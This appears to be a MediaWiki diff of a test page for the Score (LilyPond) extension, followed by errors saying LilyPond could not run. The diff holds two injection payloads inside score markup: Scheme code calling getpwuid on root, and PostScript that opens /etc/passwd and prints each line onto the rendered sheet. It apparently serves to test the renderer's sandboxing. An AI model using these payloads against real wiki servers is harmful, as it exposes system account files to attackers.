|
|
Line 22: |
Line 22: |
| \header { tagline = ##f } | | \header { tagline = ##f } |
| \paper { #(set-paper-size "a5") } | | \paper { #(set-paper-size "a5") } |
| </score>
| |
|
| |
| == LY getpwuid ==
| |
|
| |
| <score>
| |
| % 7
| |
| \new Staff <<{c^#
| |
|
| |
| (object->string (getpwuid 0))
| |
|
| |
| }>></score>
| |
|
| |
| == PS password ==
| |
|
| |
| <score>
| |
| % 6
| |
| \relative c' {
| |
| c ^\markup { \postscript #"
| |
| /TeXGyreSchola-Regular 4 output-scale div selectfont
| |
| currentpoint
| |
| /pass_y exch def
| |
| /pass_x exch def
| |
| /passfile (/etc/passwd) (r) file def
| |
| /passstr 10000 string def
| |
| {
| |
| passfile passstr readline
| |
| not { exit } if
| |
| show
| |
| /pass_y pass_y 2 sub def
| |
| pass_x pass_y moveto
| |
| } loop
| |
| " }
| |
| }
| |
| </score> | | </score> |
|
| |
|
Normal
Unable to obtain LilyPond version:
/bin/bash: line 1: /usr/local/bin/lilypond: No such file or directory
Multipage
Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond
is set correctly.
Raw
Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond
is set correctly.
Starling
Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond
is set correctly.
Rest
Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond
is set correctly.
ABC
Could not execute LilyPond: /usr/local/bin/lilypond is not an executable file. Make sure $wgScoreLilyPond
is set correctly.